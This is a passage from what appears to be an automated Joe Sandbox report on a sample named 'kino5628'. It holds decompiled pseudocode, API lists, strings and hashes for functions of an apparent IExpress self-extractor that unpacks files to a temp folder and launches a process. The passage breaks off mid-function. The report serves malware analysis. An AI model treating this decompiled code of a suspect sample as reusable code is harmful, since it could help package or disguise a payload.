0x008e5507
0x00000000
0x008e5507
0x008e54da
0x008e54dd
0x008e54f7
0x00000000
0x008e54f7
0x008e54df
0x008e54e2
0x008e54f0
0x00000000
0x008e54f0
0x008e54e7
0x00000000
0x00000000
0x008e54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E556F

Part of subcall function 008E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E53FB
Part of subcall function 008E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5402
Part of subcall function 008E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E541F
Part of subcall function 008E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E542B
Part of subcall function 008E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5434

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E547D, 008E5481, 008E54AB, 008E551C, 008E553C, 008E5568
ppc, xrefs: 008E54E9
alpha, xrefs: 008E54F0
mips, xrefs: 008E54F7
i386, xrefs: 008E54FE

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3963195772
Opcode ID: f6b970fd9ca5d42e767786d4cc503b61ad4ab0e607c105f98ad75ffe989c21f9
Instruction ID: 8dba3a5a055aeb739ace6f027e596047cfc14c578076c886e00df26edda4c22a
Opcode Fuzzy Hash: f6b970fd9ca5d42e767786d4cc503b61ad4ab0e607c105f98ad75ffe989c21f9
Instruction Fuzzy Hash: 82312971B00AD4DBCF109B2B9C8497E779AFB9374CB04013AE556C6790DB74CE418A96

Uniqueness

Uniqueness Score: -1.00%

Function 008E256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E008E256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E008E24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x008e2572
0x008e2573
0x008e2575
0x008e2578
0x008e257d
0x008e2627
0x008e2583
0x008e2586
0x008e2589
0x008e25eb
0x008e2607
0x00000000
0x008e2609
0x008e261a
0x00000000
0x008e261a
0x00000000
0x008e258b
0x008e258b
0x008e259e
0x008e25b2
0x008e25ba
0x008e25cb
0x008e25d1
0x008e25d6
0x008e25da
0x008e25dd
0x008e25dd
0x008e25e3
0x008e25e3
0x008e25e3
0x008e258b
0x008e2589
0x008e262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,008E4096,008E4096,?,008E1ED3,00000001,00000000,?,?,008E4137,?), ref: 008E25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,008E4096,?,008E1ED3,00000001,00000000,?,?,008E4137,?,008E4096), ref: 008E25CB
RegCloseKey.KERNELBASE(?,?,008E1ED3,00000001,00000000,?,?,008E4137,?,008E4096), ref: 008E25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,008E4096,008E4096,?,008E1ED3,00000001,00000000,?,?,008E4137,?), ref: 008E25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,008E4096,00000000,00000000,00000000,00000000,?,008E1ED3,00000001,00000000), ref: 008E261A

Strings

PendingFileRenameOperations, xrefs: 008E25C3
System\CurrentControlSet\Control\Session Manager, xrefs: 008E25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008E25F5

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 6a0b76f042a9e39e4dad0ec1b2c5c4deebc150d1e6792691e9278876bb08a113
Instruction ID: 02e940e83b0a70a313c03189991e1399ae3b37c118eaab69b96563317870acf2
Opcode Fuzzy Hash: 6a0b76f042a9e39e4dad0ec1b2c5c4deebc150d1e6792691e9278876bb08a113
Instruction Fuzzy Hash: FE116D359022A8FBDB20DB939C49DFFBE6CFB127A1F104155B808E2110D6705A44D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 008E6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E008E7155();
				_push(0x58);
				_push(0x8e72b8);
				E008E7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x8e88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x8e88b0; // 0x2
						if(__eflags != 0) {
							 *0x8e81e4 = _t58;
							goto L13;
						} else {
							 *0x8e88b0 = _t58;
							_t37 = E008E6C3F(0x8e10b8, 0x8e10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L008E6FF4();
						L13:
						_t68 =  *0x8e88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x8e10b4);
							_push(0x8e10ac);
							L008E7202();
							 *0x8e88b0 = 2;
						}
						if(_t53 == 0) {
							 *0x8e88ac = 0;
						}
						_t71 =  *0x8e88b4;
						if( *0x8e88b4 != 0 && E008E7060(_t71, 0x8e88b4) != 0) {
							_t60 =  *0x8e88b4; // 0x0
							 *0x8ea288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E008E2BFB(0x8e0000, 0, _t59); // executed
							 *0x8e81e0 = _t30;
							__eflags =  *0x8e81f8;
							if( *0x8e81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x8e81e4;
							if( *0x8e81e4 == 0) {
								__imp___cexit();
								_t30 =  *0x8e81e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E008E724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x008e6a60
0x008e6a6a
0x008e6a6c
0x008e6a71
0x008e6a78
0x008e6a7f
0x008e6a85
0x008e6a8e
0x008e6a91
0x008e6a93
0x008e6a9c
0x008e6aa2
0x00000000
0x00000000
0x008e6aa6
0x008e6ab4
0x00000000
0x008e6aa8
0x008e6aaa
0x008e6aab
0x008e6aab
0x008e6abf
0x008e6abf
0x008e6ac5
0x008e6ad1
0x008e6ad7
0x008e6b05
0x00000000
0x008e6ad9
0x008e6ad9
0x008e6ae9
0x008e6af0
0x008e6af2
0x00000000
0x008e6af4
0x008e6af4
0x008e6afb
0x008e6afb
0x008e6af2
0x008e6ac7
0x008e6ac7
0x008e6ac9
0x008e6b0b
0x008e6b0b
0x008e6b11
0x008e6b13
0x008e6b18
0x008e6b1d
0x008e6b24
0x008e6b24
0x008e6b30
0x008e6b39
0x008e6b39
0x008e6b3b
0x008e6b42
0x008e6b57
0x008e6b5f
0x008e6b65
0x008e6b65
0x008e6b67
0x008e6b6c
0x008e6b6e
0x008e6b71
0x008e6b74
0x008e6b74
0x008e6b79
0x00000000
0x00000000
0x008e6b7d
0x008e6b81
0x00000000
0x00000000
0x008e6b83
0x008e6b8c
0x008e6b8d
0x008e6b90
0x008e6b90
0x008e6b83
0x008e6b81
0x008e6b94
0x008e6b98
0x008e6ba2
0x008e6b9a
0x008e6b9a
0x008e6b9a
0x008e6ba3
0x008e6bab
0x008e6bb0
0x008e6bb5
0x008e6bbc
0x008e6bbf
0x00000000
0x008e6bbf
0x008e6c1e
0x008e6c25
0x008e6c27
0x008e6c2d
0x008e6c2d
0x008e6c32
0x00000000
0x008e6bc5
0x008e6bc5
0x008e6bc8
0x008e6bcc
0x008e6bce
0x008e6bce
0x008e6bd1
0x008e6bd3
0x008e6bd3
0x008e6bd6
0x008e6bda
0x008e6be1
0x008e6be3
0x008e6be5
0x008e6be5
0x008e6be6
0x008e6be6
0x008e6be9
0x008e6bea
0x008e6bea
0x008e6b74
0x008e6c39
0x008e6c3e
0x008e6c3e
0x008e6abe
0x008e6abe
0x00000000

APIs

Part of subcall function 008E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008E7182
Part of subcall function 008E7155: GetCurrentProcessId.KERNEL32 ref: 008E7191
Part of subcall function 008E7155: GetCurrentThreadId.KERNEL32 ref: 008E719A
Part of subcall function 008E7155: GetTickCount.KERNEL32 ref: 008E71A3
Part of subcall function 008E7155: QueryPerformanceCounter.KERNEL32(?), ref: 008E71B8

GetStartupInfoW.KERNEL32(?,008E72B8,00000058), ref: 008E6A7F
Sleep.KERNEL32(000003E8), ref: 008E6AB4
_amsg_exit.MSVCRT ref: 008E6AC9
_initterm.MSVCRT ref: 008E6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 008E6B49
exit.KERNELBASE ref: 008E6BBF
_ismbblead.MSVCRT ref: 008E6BDA

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 19d648650e9ff83c991fccc075ab811ce6f9c6193d902ffed5fc8b00a9e21601
Instruction ID: 08a2214fd61ad3091a45824b7719922bf85ca3b3128e086fc464b068eecf7145
Opcode Fuzzy Hash: 19d648650e9ff83c991fccc075ab811ce6f9c6193d902ffed5fc8b00a9e21601
Instruction Fuzzy Hash: 604116349443E9DFDB209B6ADC4476E77E4FB977B0F24002AE956EB290EF7488508B41

Uniqueness

Uniqueness Score: -1.00%

Function 008E58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E008E58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E008E1680(_t20, _t36, _t33);
					E008E658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x8e9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E008E44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x8e9124 = E008E6285();
					_t14 = 0;
				}
				return _t14;
			}

0x008e58cd
0x008e58d1
0x008e58d3
0x008e58d5
0x008e58d8
0x008e58d8
0x008e58da
0x008e58db
0x008e58e1
0x008e58ed
0x008e58f1
0x008e591e
0x008e592c
0x008e5943
0x008e594a
0x008e594d
0x008e5953
0x008e5959
0x00000000
0x008e595b
0x008e595c
0x008e5963
0x008e596c
0x00000000
0x008e5972
0x008e5974
0x008e597a
0x008e597a
0x008e596c
0x008e58f3
0x008e5901
0x008e5906
0x008e590b
0x008e5910
0x008e5910
0x008e5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,008E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,008E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5943
LocalFree.KERNEL32(00000000,?,008E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E594D
CloseHandle.KERNEL32(00000000,?,008E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,008E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5963

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E58CD, 008E58CF, 008E5919, 008E5962
TMP4351$.TMP, xrefs: 008E5923

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-2825630923
Opcode ID: 93e06b46fa64f67efd842307a79ae58eb49d6ecad65b0c0f2f858ecc743ae62e
Instruction ID: f4523ee26a887cf0829a5aaafdc26b6483a5155aee1133f6d80013c9249a3ee8
Opcode Fuzzy Hash: 93e06b46fa64f67efd842307a79ae58eb49d6ecad65b0c0f2f858ecc743ae62e
Instruction Fuzzy Hash: 881122317002A0ABC7246F7BAC8DA9B7F9DFF87764B100625F50AD72D2DA749C0582A0

Uniqueness

Uniqueness Score: -1.00%

Function 008E3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E008E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x8e8004; // 0xaf179a30
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E008E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x8e9124 = E008E6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E008E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x8e8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x8e9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x8e9a2c = _t44;
						}
					}
				}
				E008E411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x8e9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x008e3fef
0x008e3ffa
0x008e4001
0x008e4008
0x008e400a
0x008e400b
0x008e4010
0x008e410a
0x008e411a
0x008e411a
0x008e401c
0x008e401d
0x008e401e
0x008e401f
0x008e4033
0x008e403b
0x008e40ca
0x008e40e9
0x008e40f8
0x008e4101
0x008e4106
0x008e4106
0x008e4108
0x008e4108
0x00000000
0x008e4108
0x008e4049
0x008e405c
0x008e4062
0x008e4068
0x008e406e
0x008e4070
0x008e4077
0x008e407f
0x008e4089
0x008e408b
0x008e408b
0x008e4089
0x008e4077
0x008e4091
0x008e409c
0x008e40a8
0x008e40b8
0x00000000
0x008e40c2
0x00000000
0x008e40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 008E4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 008E4049
GetExitCodeProcess.KERNELBASE ref: 008E405C
CloseHandle.KERNEL32(?), ref: 008E409C
CloseHandle.KERNEL32(?), ref: 008E40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008E40DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 008E40E9

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 63f852b8bfc36755ad3bd545bfe2cdc4de3f49c796c4ff0678104388993aa049
Instruction ID: 1131e6173cf1933f90ed8a41e0955125fe546fcc6241c8837a2e9a9de6f7e989
Opcode Fuzzy Hash: 63f852b8bfc36755ad3bd545bfe2cdc4de3f49c796c4ff0678104388993aa049
Instruction Fuzzy Hash: 8A31D431640698ABEB209F66DC88FAB777CFBD6B10F1001A9F649D61A1C6705C85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 008E51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E008E468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E008E468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E008E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x8e9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x8e9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E008E44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x8e9124 = 0x80070714;
					goto L10;
				}
				E008E44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x8e9124 = E008E6285();
				goto L10;
			}

0x008e51fb
0x008e5207
0x008e520b
0x008e523c
0x008e5268
0x008e5270
0x008e528b
0x008e5293
0x008e529c
0x008e52a6
0x008e52b0
0x00000000
0x008e52b0
0x008e529e
0x008e5279
0x00000000
0x008e527b
0x008e5273
0x00000000
0x008e5273
0x008e524a
0x008e5250
0x008e5256
0x00000000
0x008e5256
0x008e5219
0x008e5223
0x00000000

APIs

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008E2F4D,?,00000002,00000000), ref: 008E5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008E5250

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Part of subcall function 008E6285: GetLastError.KERNEL32(008E5BBC), ref: 008E6285

Strings

UPROMPT, xrefs: 008E51EF, 008E5230
<None>, xrefs: 008E5262

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: b8ac98a5fa4dcc546fca74de33a0cf733d101530db14ca87d54f153fae35bb0a
Instruction ID: 8929b04dbe212749da1c5360fd1837ca2230d547f1eecf93858411da5a852ca2
Opcode Fuzzy Hash: b8ac98a5fa4dcc546fca74de33a0cf733d101530db14ca87d54f153fae35bb0a
Instruction Fuzzy Hash: D61108713016C5ABE7246B775C89F3B719EFB8B798B104029FB46DA290EABD9C005125

Uniqueness

Uniqueness Score: -1.00%

Function 008E52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E008E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
